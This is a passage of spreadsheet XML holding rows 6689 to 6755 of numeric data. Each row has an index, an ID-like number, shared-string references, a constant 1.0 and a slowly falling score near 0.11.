    <row r="6689" ht="15.75" customHeight="1">
      <c r="A6689" s="1">
        <v>27644.0</v>
      </c>
      <c r="B6689" s="2">
        <v>2.2751891E7</v>
      </c>
      <c r="C6689" s="2" t="s">
        <v>6124</v>
      </c>
      <c r="D6689" s="2">
        <v>1.0</v>
      </c>
      <c r="E6689" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6689" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="6690" ht="15.75" customHeight="1">
      <c r="A6690" s="1">
        <v>31113.0</v>
      </c>
      <c r="B6690" s="2">
        <v>4.8721765E7</v>
      </c>
      <c r="C6690" s="2" t="s">
        <v>6357</v>
      </c>
      <c r="D6690" s="2">
        <v>1.0</v>
      </c>
      <c r="E6690" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6690" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="6691" ht="15.75" customHeight="1">
      <c r="A6691" s="1">
        <v>21931.0</v>
      </c>
      <c r="B6691" s="2">
        <v>2.8528828E7</v>
      </c>
      <c r="C6691" s="2" t="s">
        <v>6360</v>
      </c>
      <c r="D6691" s="2">
        <v>1.0</v>
      </c>
      <c r="E6691" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6691" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="6692" ht="15.75" customHeight="1">
      <c r="A6692" s="1">
        <v>22548.0</v>
      </c>
      <c r="B6692" s="2">
        <v>3.8137614E7</v>
      </c>
      <c r="C6692" s="2" t="s">
        <v>6361</v>
      </c>
      <c r="D6692" s="2">
        <v>1.0</v>
      </c>
      <c r="E6692" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6692" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="6693" ht="15.75" customHeight="1">
      <c r="A6693" s="1">
        <v>22965.0</v>
      </c>
      <c r="B6693" s="2">
        <v>4.9188146E7</v>
      </c>
      <c r="C6693" s="2" t="s">
        <v>6362</v>
      </c>
      <c r="D6693" s="2">
        <v>1.0</v>
      </c>
      <c r="E6693" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6693" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="6694" ht="15.75" customHeight="1">
      <c r="A6694" s="1">
        <v>28495.0</v>
      </c>
      <c r="B6694" s="2">
        <v>2.668622E7</v>
      </c>
      <c r="C6694" s="2" t="s">
        <v>6363</v>
      </c>
      <c r="D6694" s="2">
        <v>1.0</v>
      </c>
      <c r="E6694" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6694" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="6695" ht="15.75" customHeight="1">
      <c r="A6695" s="1">
        <v>20231.0</v>
      </c>
      <c r="B6695" s="2">
        <v>1.080153E7</v>
      </c>
      <c r="C6695" s="2" t="s">
        <v>6364</v>
      </c>
      <c r="D6695" s="2">
        <v>1.0</v>
      </c>
      <c r="E6695" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6695" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="6696" ht="15.75" customHeight="1">
      <c r="A6696" s="1">
        <v>20582.0</v>
      </c>
      <c r="B6696" s="2">
        <v>1.3704296E7</v>
      </c>
      <c r="C6696" s="2" t="s">
        <v>6365</v>
      </c>
      <c r="D6696" s="2">
        <v>1.0</v>
      </c>
      <c r="E6696" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6696" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="6697" ht="15.75" customHeight="1">
      <c r="A6697" s="1">
        <v>25461.0</v>
      </c>
      <c r="B6697" s="2">
        <v>1.3974292E7</v>
      </c>
      <c r="C6697" s="2" t="s">
        <v>6366</v>
      </c>
      <c r="D6697" s="2">
        <v>1.0</v>
      </c>
      <c r="E6697" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6697" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="6698" ht="15.75" customHeight="1">
      <c r="A6698" s="1">
        <v>32726.0</v>
      </c>
      <c r="B6698" s="2">
        <v>5998866.0</v>
      </c>
      <c r="C6698" s="2" t="s">
        <v>6366</v>
      </c>
      <c r="D6698" s="2">
        <v>1.0</v>
      </c>
      <c r="E6698" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6698" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="6699" ht="15.75" customHeight="1">
      <c r="A6699" s="1">
        <v>14592.0</v>
      </c>
      <c r="B6699" s="2">
        <v>4.0208607E7</v>
      </c>
      <c r="C6699" s="2" t="s">
        <v>6367</v>
      </c>
      <c r="D6699" s="2">
        <v>1.0</v>
      </c>
      <c r="E6699" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6699" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="6700" ht="15.75" customHeight="1">
      <c r="A6700" s="1">
        <v>23967.0</v>
      </c>
      <c r="B6700" s="2">
        <v>9034460.0</v>
      </c>
      <c r="C6700" s="2" t="s">
        <v>6368</v>
      </c>
      <c r="D6700" s="2">
        <v>1.0</v>
      </c>
      <c r="E6700" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6700" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="6701" ht="15.75" customHeight="1">
      <c r="A6701" s="1">
        <v>26249.0</v>
      </c>
      <c r="B6701" s="2">
        <v>1.6324144E7</v>
      </c>
      <c r="C6701" s="2" t="s">
        <v>6369</v>
      </c>
      <c r="D6701" s="2">
        <v>1.0</v>
      </c>
      <c r="E6701" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6701" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="6702" ht="15.75" customHeight="1">
      <c r="A6702" s="1">
        <v>26271.0</v>
      </c>
      <c r="B6702" s="2">
        <v>1.639789E7</v>
      </c>
      <c r="C6702" s="2" t="s">
        <v>6370</v>
      </c>
      <c r="D6702" s="2">
        <v>1.0</v>
      </c>
      <c r="E6702" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6702" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="6703" ht="15.75" customHeight="1">
      <c r="A6703" s="1">
        <v>26530.0</v>
      </c>
      <c r="B6703" s="2">
        <v>1.7705013E7</v>
      </c>
      <c r="C6703" s="2" t="s">
        <v>6371</v>
      </c>
      <c r="D6703" s="2">
        <v>1.0</v>
      </c>
      <c r="E6703" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6703" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="6704" ht="15.75" customHeight="1">
      <c r="A6704" s="1">
        <v>27216.0</v>
      </c>
      <c r="B6704" s="2">
        <v>2.0966557E7</v>
      </c>
      <c r="C6704" s="2" t="s">
        <v>6372</v>
      </c>
      <c r="D6704" s="2">
        <v>1.0</v>
      </c>
      <c r="E6704" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6704" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="6705" ht="15.75" customHeight="1">
      <c r="A6705" s="1">
        <v>31552.0</v>
      </c>
      <c r="B6705" s="2">
        <v>5114526.0</v>
      </c>
      <c r="C6705" s="2" t="s">
        <v>6373</v>
      </c>
      <c r="D6705" s="2">
        <v>1.0</v>
      </c>
      <c r="E6705" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6705" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="6706" ht="15.75" customHeight="1">
      <c r="A6706" s="1">
        <v>33451.0</v>
      </c>
      <c r="B6706" s="2">
        <v>7883603.0</v>
      </c>
      <c r="C6706" s="2" t="s">
        <v>6374</v>
      </c>
      <c r="D6706" s="2">
        <v>1.0</v>
      </c>
      <c r="E6706" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6706" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="6707" ht="15.75" customHeight="1">
      <c r="A6707" s="1">
        <v>33453.0</v>
      </c>
      <c r="B6707" s="2">
        <v>7883638.0</v>
      </c>
      <c r="C6707" s="2" t="s">
        <v>6374</v>
      </c>
      <c r="D6707" s="2">
        <v>1.0</v>
      </c>
      <c r="E6707" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6707" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="6708" ht="15.75" customHeight="1">
      <c r="A6708" s="1">
        <v>26312.0</v>
      </c>
      <c r="B6708" s="2">
        <v>1.6648597E7</v>
      </c>
      <c r="C6708" s="2" t="s">
        <v>6375</v>
      </c>
      <c r="D6708" s="2">
        <v>1.0</v>
      </c>
      <c r="E6708" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6708" s="2">
        <v>0.1137152777777778</v>
      </c>
    </row>
    <row r="6709" ht="15.75" customHeight="1">
      <c r="A6709" s="1">
        <v>28275.0</v>
      </c>
      <c r="B6709" s="2">
        <v>2.5403191E7</v>
      </c>
      <c r="C6709" s="2" t="s">
        <v>6376</v>
      </c>
      <c r="D6709" s="2">
        <v>1.0</v>
      </c>
      <c r="E6709" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6709" s="2">
        <v>0.1136752136752137</v>
      </c>
    </row>
    <row r="6710" ht="15.75" customHeight="1">
      <c r="A6710" s="1">
        <v>28327.0</v>
      </c>
      <c r="B6710" s="2">
        <v>2.5879564E7</v>
      </c>
      <c r="C6710" s="2" t="s">
        <v>6377</v>
      </c>
      <c r="D6710" s="2">
        <v>1.0</v>
      </c>
      <c r="E6710" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6710" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="6711" ht="15.75" customHeight="1">
      <c r="A6711" s="1">
        <v>30722.0</v>
      </c>
      <c r="B6711" s="2">
        <v>4.3483441E7</v>
      </c>
      <c r="C6711" s="2" t="s">
        <v>6378</v>
      </c>
      <c r="D6711" s="2">
        <v>1.0</v>
      </c>
      <c r="E6711" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6711" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="6712" ht="15.75" customHeight="1">
      <c r="A6712" s="1">
        <v>13363.0</v>
      </c>
      <c r="B6712" s="2">
        <v>3.4799995E7</v>
      </c>
      <c r="C6712" s="2" t="s">
        <v>6379</v>
      </c>
      <c r="D6712" s="2">
        <v>1.0</v>
      </c>
      <c r="E6712" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6712" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="6713" ht="15.75" customHeight="1">
      <c r="A6713" s="1">
        <v>21438.0</v>
      </c>
      <c r="B6713" s="2">
        <v>2.2290553E7</v>
      </c>
      <c r="C6713" s="2" t="s">
        <v>6380</v>
      </c>
      <c r="D6713" s="2">
        <v>1.0</v>
      </c>
      <c r="E6713" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6713" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="6714" ht="15.75" customHeight="1">
      <c r="A6714" s="1">
        <v>22013.0</v>
      </c>
      <c r="B6714" s="2">
        <v>2.9910508E7</v>
      </c>
      <c r="C6714" s="2" t="s">
        <v>6381</v>
      </c>
      <c r="D6714" s="2">
        <v>1.0</v>
      </c>
      <c r="E6714" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6714" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="6715" ht="15.75" customHeight="1">
      <c r="A6715" s="1">
        <v>22817.0</v>
      </c>
      <c r="B6715" s="2">
        <v>4.6177439E7</v>
      </c>
      <c r="C6715" s="2" t="s">
        <v>6195</v>
      </c>
      <c r="D6715" s="2">
        <v>1.0</v>
      </c>
      <c r="E6715" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6715" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="6716" ht="15.75" customHeight="1">
      <c r="A6716" s="1">
        <v>8690.0</v>
      </c>
      <c r="B6716" s="2">
        <v>5.4409639E7</v>
      </c>
      <c r="C6716" s="2" t="s">
        <v>6382</v>
      </c>
      <c r="D6716" s="2">
        <v>1.0</v>
      </c>
      <c r="E6716" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6716" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6717" ht="15.75" customHeight="1">
      <c r="A6717" s="1">
        <v>13588.0</v>
      </c>
      <c r="B6717" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C6717" s="2" t="s">
        <v>6383</v>
      </c>
      <c r="D6717" s="2">
        <v>1.0</v>
      </c>
      <c r="E6717" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6717" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6718" ht="15.75" customHeight="1">
      <c r="A6718" s="1">
        <v>18638.0</v>
      </c>
      <c r="B6718" s="2">
        <v>5.3408571E7</v>
      </c>
      <c r="C6718" s="2" t="s">
        <v>6384</v>
      </c>
      <c r="D6718" s="2">
        <v>1.0</v>
      </c>
      <c r="E6718" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6718" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6719" ht="15.75" customHeight="1">
      <c r="A6719" s="1">
        <v>20676.0</v>
      </c>
      <c r="B6719" s="2">
        <v>1.4409179E7</v>
      </c>
      <c r="C6719" s="2" t="s">
        <v>6385</v>
      </c>
      <c r="D6719" s="2">
        <v>1.0</v>
      </c>
      <c r="E6719" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6719" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6720" ht="15.75" customHeight="1">
      <c r="A6720" s="1">
        <v>21522.0</v>
      </c>
      <c r="B6720" s="2">
        <v>2.3313067E7</v>
      </c>
      <c r="C6720" s="2" t="s">
        <v>6386</v>
      </c>
      <c r="D6720" s="2">
        <v>1.0</v>
      </c>
      <c r="E6720" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6720" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6721" ht="15.75" customHeight="1">
      <c r="A6721" s="1">
        <v>22446.0</v>
      </c>
      <c r="B6721" s="2">
        <v>3625091.0</v>
      </c>
      <c r="C6721" s="2" t="s">
        <v>6387</v>
      </c>
      <c r="D6721" s="2">
        <v>1.0</v>
      </c>
      <c r="E6721" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6721" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6722" ht="15.75" customHeight="1">
      <c r="A6722" s="1">
        <v>22560.0</v>
      </c>
      <c r="B6722" s="2">
        <v>3.8375043E7</v>
      </c>
      <c r="C6722" s="2" t="s">
        <v>6388</v>
      </c>
      <c r="D6722" s="2">
        <v>1.0</v>
      </c>
      <c r="E6722" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6722" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6723" ht="15.75" customHeight="1">
      <c r="A6723" s="1">
        <v>23467.0</v>
      </c>
      <c r="B6723" s="2">
        <v>5715361.0</v>
      </c>
      <c r="C6723" s="2" t="s">
        <v>6389</v>
      </c>
      <c r="D6723" s="2">
        <v>1.0</v>
      </c>
      <c r="E6723" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6723" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6724" ht="15.75" customHeight="1">
      <c r="A6724" s="1">
        <v>27238.0</v>
      </c>
      <c r="B6724" s="2">
        <v>2.1047142E7</v>
      </c>
      <c r="C6724" s="2" t="s">
        <v>6390</v>
      </c>
      <c r="D6724" s="2">
        <v>1.0</v>
      </c>
      <c r="E6724" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6724" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6725" ht="15.75" customHeight="1">
      <c r="A6725" s="1">
        <v>27268.0</v>
      </c>
      <c r="B6725" s="2">
        <v>2.1202779E7</v>
      </c>
      <c r="C6725" s="2" t="s">
        <v>6391</v>
      </c>
      <c r="D6725" s="2">
        <v>1.0</v>
      </c>
      <c r="E6725" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6725" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6726" ht="15.75" customHeight="1">
      <c r="A6726" s="1">
        <v>27366.0</v>
      </c>
      <c r="B6726" s="2">
        <v>2.167744E7</v>
      </c>
      <c r="C6726" s="2" t="s">
        <v>6013</v>
      </c>
      <c r="D6726" s="2">
        <v>1.0</v>
      </c>
      <c r="E6726" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6726" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6727" ht="15.75" customHeight="1">
      <c r="A6727" s="1">
        <v>28842.0</v>
      </c>
      <c r="B6727" s="2">
        <v>2.8934836E7</v>
      </c>
      <c r="C6727" s="2" t="s">
        <v>6392</v>
      </c>
      <c r="D6727" s="2">
        <v>1.0</v>
      </c>
      <c r="E6727" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6727" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6728" ht="15.75" customHeight="1">
      <c r="A6728" s="1">
        <v>30065.0</v>
      </c>
      <c r="B6728" s="2">
        <v>3625165.0</v>
      </c>
      <c r="C6728" s="2" t="s">
        <v>6393</v>
      </c>
      <c r="D6728" s="2">
        <v>1.0</v>
      </c>
      <c r="E6728" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6728" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6729" ht="15.75" customHeight="1">
      <c r="A6729" s="1">
        <v>31505.0</v>
      </c>
      <c r="B6729" s="2">
        <v>5.0692638E7</v>
      </c>
      <c r="C6729" s="2" t="s">
        <v>6394</v>
      </c>
      <c r="D6729" s="2">
        <v>1.0</v>
      </c>
      <c r="E6729" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6729" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6730" ht="15.75" customHeight="1">
      <c r="A6730" s="1">
        <v>32543.0</v>
      </c>
      <c r="B6730" s="2">
        <v>5749776.0</v>
      </c>
      <c r="C6730" s="2" t="s">
        <v>6395</v>
      </c>
      <c r="D6730" s="2">
        <v>1.0</v>
      </c>
      <c r="E6730" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6730" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="6731" ht="15.75" customHeight="1">
      <c r="A6731" s="1">
        <v>233.0</v>
      </c>
      <c r="B6731" s="2">
        <v>1.4759899E7</v>
      </c>
      <c r="C6731" s="2" t="s">
        <v>6396</v>
      </c>
      <c r="D6731" s="2">
        <v>1.0</v>
      </c>
      <c r="E6731" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6731" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6732" ht="15.75" customHeight="1">
      <c r="A6732" s="1">
        <v>1543.0</v>
      </c>
      <c r="B6732" s="2">
        <v>2.75731E7</v>
      </c>
      <c r="C6732" s="2" t="s">
        <v>6397</v>
      </c>
      <c r="D6732" s="2">
        <v>1.0</v>
      </c>
      <c r="E6732" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6732" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6733" ht="15.75" customHeight="1">
      <c r="A6733" s="1">
        <v>3469.0</v>
      </c>
      <c r="B6733" s="2">
        <v>3.8339304E7</v>
      </c>
      <c r="C6733" s="2" t="s">
        <v>6398</v>
      </c>
      <c r="D6733" s="2">
        <v>1.0</v>
      </c>
      <c r="E6733" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6733" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6734" ht="15.75" customHeight="1">
      <c r="A6734" s="1">
        <v>3795.0</v>
      </c>
      <c r="B6734" s="2">
        <v>3.9958765E7</v>
      </c>
      <c r="C6734" s="2" t="s">
        <v>6399</v>
      </c>
      <c r="D6734" s="2">
        <v>1.0</v>
      </c>
      <c r="E6734" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6734" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6735" ht="15.75" customHeight="1">
      <c r="A6735" s="1">
        <v>5725.0</v>
      </c>
      <c r="B6735" s="2">
        <v>4.6603494E7</v>
      </c>
      <c r="C6735" s="2" t="s">
        <v>6400</v>
      </c>
      <c r="D6735" s="2">
        <v>1.0</v>
      </c>
      <c r="E6735" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6735" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6736" ht="15.75" customHeight="1">
      <c r="A6736" s="1">
        <v>6143.0</v>
      </c>
      <c r="B6736" s="2">
        <v>4.7835781E7</v>
      </c>
      <c r="C6736" s="2" t="s">
        <v>6401</v>
      </c>
      <c r="D6736" s="2">
        <v>1.0</v>
      </c>
      <c r="E6736" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6736" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6737" ht="15.75" customHeight="1">
      <c r="A6737" s="1">
        <v>7963.0</v>
      </c>
      <c r="B6737" s="2">
        <v>5.2682187E7</v>
      </c>
      <c r="C6737" s="2" t="s">
        <v>6402</v>
      </c>
      <c r="D6737" s="2">
        <v>1.0</v>
      </c>
      <c r="E6737" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6737" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6738" ht="15.75" customHeight="1">
      <c r="A6738" s="1">
        <v>8030.0</v>
      </c>
      <c r="B6738" s="2">
        <v>5.2821545E7</v>
      </c>
      <c r="C6738" s="2" t="s">
        <v>6403</v>
      </c>
      <c r="D6738" s="2">
        <v>1.0</v>
      </c>
      <c r="E6738" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6738" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6739" ht="15.75" customHeight="1">
      <c r="A6739" s="1">
        <v>8076.0</v>
      </c>
      <c r="B6739" s="2">
        <v>5.3009567E7</v>
      </c>
      <c r="C6739" s="2" t="s">
        <v>6404</v>
      </c>
      <c r="D6739" s="2">
        <v>1.0</v>
      </c>
      <c r="E6739" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6739" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6740" ht="15.75" customHeight="1">
      <c r="A6740" s="1">
        <v>8353.0</v>
      </c>
      <c r="B6740" s="2">
        <v>5.3754237E7</v>
      </c>
      <c r="C6740" s="2" t="s">
        <v>6405</v>
      </c>
      <c r="D6740" s="2">
        <v>1.0</v>
      </c>
      <c r="E6740" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6740" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6741" ht="15.75" customHeight="1">
      <c r="A6741" s="1">
        <v>9243.0</v>
      </c>
      <c r="B6741" s="2">
        <v>5.5467853E7</v>
      </c>
      <c r="C6741" s="2" t="s">
        <v>6406</v>
      </c>
      <c r="D6741" s="2">
        <v>1.0</v>
      </c>
      <c r="E6741" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6741" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6742" ht="15.75" customHeight="1">
      <c r="A6742" s="1">
        <v>10006.0</v>
      </c>
      <c r="B6742" s="2">
        <v>5.7015772E7</v>
      </c>
      <c r="C6742" s="2" t="s">
        <v>6407</v>
      </c>
      <c r="D6742" s="2">
        <v>1.0</v>
      </c>
      <c r="E6742" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6742" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6743" ht="15.75" customHeight="1">
      <c r="A6743" s="1">
        <v>10008.0</v>
      </c>
      <c r="B6743" s="2">
        <v>5.7015772E7</v>
      </c>
      <c r="C6743" s="2" t="s">
        <v>6407</v>
      </c>
      <c r="D6743" s="2">
        <v>1.0</v>
      </c>
      <c r="E6743" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6743" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6744" ht="15.75" customHeight="1">
      <c r="A6744" s="1">
        <v>10474.0</v>
      </c>
      <c r="B6744" s="2">
        <v>1.0871077E7</v>
      </c>
      <c r="C6744" s="2" t="s">
        <v>6408</v>
      </c>
      <c r="D6744" s="2">
        <v>1.0</v>
      </c>
      <c r="E6744" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6744" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6745" ht="15.75" customHeight="1">
      <c r="A6745" s="1">
        <v>11497.0</v>
      </c>
      <c r="B6745" s="2">
        <v>2.2079709E7</v>
      </c>
      <c r="C6745" s="2" t="s">
        <v>6409</v>
      </c>
      <c r="D6745" s="2">
        <v>1.0</v>
      </c>
      <c r="E6745" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6745" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6746" ht="15.75" customHeight="1">
      <c r="A6746" s="1">
        <v>12409.0</v>
      </c>
      <c r="B6746" s="2">
        <v>2.9058949E7</v>
      </c>
      <c r="C6746" s="2" t="s">
        <v>6410</v>
      </c>
      <c r="D6746" s="2">
        <v>1.0</v>
      </c>
      <c r="E6746" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6746" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6747" ht="15.75" customHeight="1">
      <c r="A6747" s="1">
        <v>13162.0</v>
      </c>
      <c r="B6747" s="2">
        <v>3.3917208E7</v>
      </c>
      <c r="C6747" s="2" t="s">
        <v>6411</v>
      </c>
      <c r="D6747" s="2">
        <v>1.0</v>
      </c>
      <c r="E6747" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6747" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6748" ht="15.75" customHeight="1">
      <c r="A6748" s="1">
        <v>14918.0</v>
      </c>
      <c r="B6748" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C6748" s="2" t="s">
        <v>6412</v>
      </c>
      <c r="D6748" s="2">
        <v>1.0</v>
      </c>
      <c r="E6748" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6748" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6749" ht="15.75" customHeight="1">
      <c r="A6749" s="1">
        <v>15286.0</v>
      </c>
      <c r="B6749" s="2">
        <v>4.2418983E7</v>
      </c>
      <c r="C6749" s="2" t="s">
        <v>6413</v>
      </c>
      <c r="D6749" s="2">
        <v>1.0</v>
      </c>
      <c r="E6749" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6749" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6750" ht="15.75" customHeight="1">
      <c r="A6750" s="1">
        <v>17321.0</v>
      </c>
      <c r="B6750" s="2">
        <v>4.934234E7</v>
      </c>
      <c r="C6750" s="2" t="s">
        <v>6414</v>
      </c>
      <c r="D6750" s="2">
        <v>1.0</v>
      </c>
      <c r="E6750" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6750" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6751" ht="15.75" customHeight="1">
      <c r="A6751" s="1">
        <v>17408.0</v>
      </c>
      <c r="B6751" s="2">
        <v>4.9658726E7</v>
      </c>
      <c r="C6751" s="2" t="s">
        <v>6415</v>
      </c>
      <c r="D6751" s="2">
        <v>1.0</v>
      </c>
      <c r="E6751" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6751" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6752" ht="15.75" customHeight="1">
      <c r="A6752" s="1">
        <v>17411.0</v>
      </c>
      <c r="B6752" s="2">
        <v>4.9658726E7</v>
      </c>
      <c r="C6752" s="2" t="s">
        <v>6416</v>
      </c>
      <c r="D6752" s="2">
        <v>1.0</v>
      </c>
      <c r="E6752" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6752" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6753" ht="15.75" customHeight="1">
      <c r="A6753" s="1">
        <v>18101.0</v>
      </c>
      <c r="B6753" s="2">
        <v>5.1718537E7</v>
      </c>
      <c r="C6753" s="2" t="s">
        <v>6417</v>
      </c>
      <c r="D6753" s="2">
        <v>1.0</v>
      </c>
      <c r="E6753" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6753" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6754" ht="15.75" customHeight="1">
      <c r="A6754" s="1">
        <v>18122.0</v>
      </c>
      <c r="B6754" s="2">
        <v>5.1774072E7</v>
      </c>
      <c r="C6754" s="2" t="s">
        <v>6418</v>
      </c>
      <c r="D6754" s="2">
        <v>1.0</v>
      </c>
      <c r="E6754" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6754" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="6755" ht="15.75" customHeight="1">
      <c r="A6755" s="1">
        <v>19849.0</v>
      </c>
      <c r="B6755" s="2">
        <v>5.7116747E7</v>
      </c>
      <c r="C6755" s="2" t="s">
        <v>6419</v>
      </c>
      <c r="D6755" s="2">
        <v>1.0</v>
      </c>
      <c r="E6755" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6755" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
